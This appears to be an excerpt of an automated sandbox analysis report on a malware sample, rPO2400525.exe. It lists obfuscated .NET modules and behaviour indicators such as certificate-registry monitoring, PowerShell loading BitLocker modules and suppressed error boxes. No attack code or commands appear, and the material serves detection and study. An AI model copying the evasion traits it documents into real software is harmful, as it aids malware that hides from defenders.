Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs | High entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, JFs7aKL782U3eANt9o.cs | High entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, cJ4Zjydd7bKydcPZNVK.cs | High entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, XmHcvvITaPtJ9TGC9k.cs | High entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, SoMUnDa1l5q0UZYjMQ.cs | High entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, IfeYct5GqX3EA1vWQs.cs | High entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, QmNxRKPlC4gn0sRcV1.cs | High entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, WGBtAgu9e8eGuUqGon.cs | High entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, YCrCE67WdClXvvj9dJ.cs | High entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, OERyRezUeySYGOwujG.cs | High entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, KLxxx4fY9da11kemkF.cs | High entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, KVRbeMHT26Q3AmdiFs.cs | High entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, UoInSmdhbkUxcqdcNvi.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, uqcWmDxK2RTnDoC0Fe.cs | High entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, IK9F1N2fUYNiLES1HN.cs | High entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.csHigh entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, W5vsRJjgYp5dhv3jt9.csHigh entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, fITsPGCclECbKn2Anm.csHigh entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, PdtvdfYUwTWmPyvkVM.csHigh entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, rx779KyfXyPA4V7nik.csHigh entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, t1NaILdyZBBFZU8pqRQ.csHigh entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.csHigh entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, JFs7aKL782U3eANt9o.csHigh entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, cJ4Zjydd7bKydcPZNVK.csHigh entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, XmHcvvITaPtJ9TGC9k.csHigh entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, SoMUnDa1l5q0UZYjMQ.csHigh entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, IfeYct5GqX3EA1vWQs.csHigh entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, QmNxRKPlC4gn0sRcV1.csHigh entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, WGBtAgu9e8eGuUqGon.csHigh entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, YCrCE67WdClXvvj9dJ.csHigh entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, OERyRezUeySYGOwujG.csHigh entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, KLxxx4fY9da11kemkF.csHigh entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, KVRbeMHT26Q3AmdiFs.csHigh entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, UoInSmdhbkUxcqdcNvi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, uqcWmDxK2RTnDoC0Fe.csHigh entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, IK9F1N2fUYNiLES1HN.csHigh entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.csHigh entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, W5vsRJjgYp5dhv3jt9.csHigh entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, fITsPGCclECbKn2Anm.csHigh entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, PdtvdfYUwTWmPyvkVM.csHigh entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, rx779KyfXyPA4V7nik.csHigh entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, t1NaILdyZBBFZU8pqRQ.csHigh entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.csHigh entropy of concatenated method names: 'JdXZDmc3yT', 'fOaZ0xeYyB', 'yOfZfObxr9', 'QjEZvGCYEE', 'XKTZ9ZLY0w', 'CRMZVDiqCA', 'BKYZQC82hI', 'tdKZwqDETo', 'IjeZ88opB0', 'z8CZpBMo9L'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, JFs7aKL782U3eANt9o.csHigh entropy of concatenated method names: 'ifAkMvclZe', 'cVukNCvoxG', 'M3akkOL4bc', 'CQak64OCJI', 'O93kemZRDy', 'jOpk3bAoN0', 'Dispose', 'Yo3G0QVQMB', 'qOPGf9bAvk', 'C5GGvmFFsi'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, cJ4Zjydd7bKydcPZNVK.csHigh entropy of concatenated method names: 'di1nI4ZnhC', 'Q3lnzuebPB', 'mlh6hMW5bY', 'mPb6ducdvr', 'qqN6yBsFl6', 'SXC6ZA45Dw', 'm4I6xGtbd2', 'AwA6D80Zam', 's1k600eH1q', 'uiB6fEBBRK'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, XmHcvvITaPtJ9TGC9k.csHigh entropy of concatenated method names: 'nLHnv99ODY', 'bNvn9e1Ds7', 'rr1nVJqDa1', 'VNsnQETaov', 'CdGnkCorWC', 'FQ8nwnC7qU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, SoMUnDa1l5q0UZYjMQ.csHigh entropy of concatenated method names: 'MHxMEGZinA', 'm9DMiArTRb', 'TvPMaotBGy', 'xxUMr0p4rY', 'IcTMUyp3L9', 'VHQMgfYP2v', 'MHlMOcbnhI', 'J1LM1RV8PZ', 'UdeM5e30E6', 'QhqMHSNpa8'
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, IfeYct5GqX3EA1vWQs.csHigh entropy of concatenated method names: 'sIbVP8C4pD', 'VldVBeWGum', 'SjpVJVjxOK', 'ToString', 'L2IVuxi5OX', 'CcBVLKfdpr', 'h0QW0RN3cEf4mnu8NaU', 'GB3oOaNeuObiYMvK34Y', 'a7uX80NjtAK3Oj7WjHq'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
                Source: C:\Users\user\Desktop\rPO2400525.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
